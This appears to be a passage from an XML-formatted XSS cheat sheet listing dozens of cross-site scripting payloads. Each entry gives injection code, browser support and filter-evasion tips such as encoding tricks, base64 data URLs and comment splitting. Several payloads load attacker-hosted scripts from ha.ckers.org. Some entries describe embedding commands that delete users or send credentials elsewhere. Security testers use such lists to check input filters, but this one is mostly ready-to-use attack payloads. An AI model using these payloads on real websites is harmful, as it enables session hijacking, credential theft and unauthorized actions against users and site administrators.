<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>XSS Quick Test</name>
<code>&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}</code>
<desc>If you don&apos;t have much space, this string is a nice compact XSS injection check. View source after injecting it and look for &lt;XSS versus &amp;lt;XSS to see if it is vulnerable.</desc>
<label>Basic XSS Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>SCRIPT w/Alert()</name>
<code>&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;</code>
<desc>Basic injection attack</desc>
<label>Basic XSS Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>SCRIPT w/Source File</name>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</code>
<desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
<label>Basic XSS Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>SCRIPT w/Char Code</name>
<code>&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</code>
<desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word &quot;XSS&quot; will pop up.</desc>
<label>Basic XSS Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>BASE</name>
<code>&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;</code>
<desc>Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won&apos;t get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like &quot;images/image.jpg&quot; rather than full paths. If the path includes a leading forward slash like &quot;/images/image.jpg&quot; you can remove one slash from this vector (as long as there are two to begin the comment this will work</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>BGSOUND</name>
<code>&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>BGSOUND</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>BODY background-image</name>
<code>&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>BODY image</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>BODY ONLOAD</name>
<code>&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;</code>
<desc>BODY tag (I like this method because it doesn&apos;t require using any variants of &quot;javascript:&quot; or &quot;&lt;SCRIPT...&quot; to accomplish the XSS attack)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>DIV background-image 1</name>
<code>&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;</code>
<desc>Div background-image</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>DIV background-image 2</name>
<code>&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;</code>
<desc>Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>DIV expression</name>
<code>&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;</code>
<desc>Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and &quot;expression&quot;</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>FRAME</name>
<code>&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;</code>
<desc>Frame (Frames have the same sorts of XSS problems as iframes).</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>IFRAME</name>
<code>&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;</code>
<desc>Iframe (If iframes are allowed there are a lot of other XSS problems as well).</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>INPUT Image</name>
<code>&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>INPUT Image</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>IMG w/JavaScript Directive</name>
<code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Image XSS using the JavaScript directive.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>IMG No Quotes/Semicolon</name>
<code>&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;</code>
<desc>No quotes and no semicolon</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>IMG Dynsrc</name>
<code>&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>IMG Dynsrc</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>IMG Lowsrc</name>
<code>&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>IMG Lowsrc</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>IMG Embedded commands 1</name>
<code>&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</code>
<desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>IMG Embedded commands 2</name>
<code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser</code>
<desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal &lt;IMG SRC=&quot;http://badguy.com/a.jpg&quot;&gt; could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>IMG STYLE w/expression</name>
<code>exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</code>
<desc>IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>List-style-image</name>
<code>&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</code>
<desc>Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>IMG w/VBscript</name>
<code>&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;</code>
<desc>VBscript in an image</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>LAYER</name>
<code>&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;</code>
<desc>Layer (Older Netscape only)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Livescript</name>
<code>&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;</code>
<desc>Livescript (Older Netscape only)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
</attack>
<attack>
<name>US-ASCII encoding</name>
<code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
<desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS4&lt;/span&gt;]</browser>
</attack>
<attack>
<name>META</name>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>The odd thing about meta refresh is that it doesn&apos;t send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>META w/data:URL</name>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;</code>
<desc>This is nice because it also doesn&apos;t have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>META w/additional URL parameter</name>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an &quot;http://&quot; you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Mocha</name>
<code>&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;</code>
<desc>Mocha (Older Netscape only)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
</attack>
<attack>
<name>OBJECT</name>
<code>&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;</code>
<desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>OBJECT w/Embedded XSS</name>
<code>&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;</code>
<desc>Using an OBJECT tag you can embed XSS directly (this is unverified).</desc>
<label>HTML Element Attacks</label>
<browser>Browser support:</browser>
</attack>
<attack>
<name>Embed Flash</name>
<code>&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;</code>
<desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=&quot;never&quot; and allownetworking=&quot;internal&quot; it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>OBJECT w/Flash 2</name>
<code>a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);</code>
<desc>Using this action script inside flash can obfuscate your XSS vector.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>STYLE</name>
<code>&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;</code>
<desc>STYLE tag (Older versions of Netscape only)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS4&lt;/span&gt;]</browser>
</attack>
<attack>
<name>STYLE w/Comment</name>
<code>&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;</code>
<desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>STYLE w/Anonymous HTML</name>
<code>&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;</code>
<desc>Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don&apos;t really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>STYLE w/background-image</name>
<code>&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</code>
<desc>STYLE tag using background-image.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>STYLE w/background</name>
<code>&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;</code>
<desc>STYLE tag using background.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Stylesheet</name>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Stylesheet</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Remote Stylesheet 1</name>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;</code>
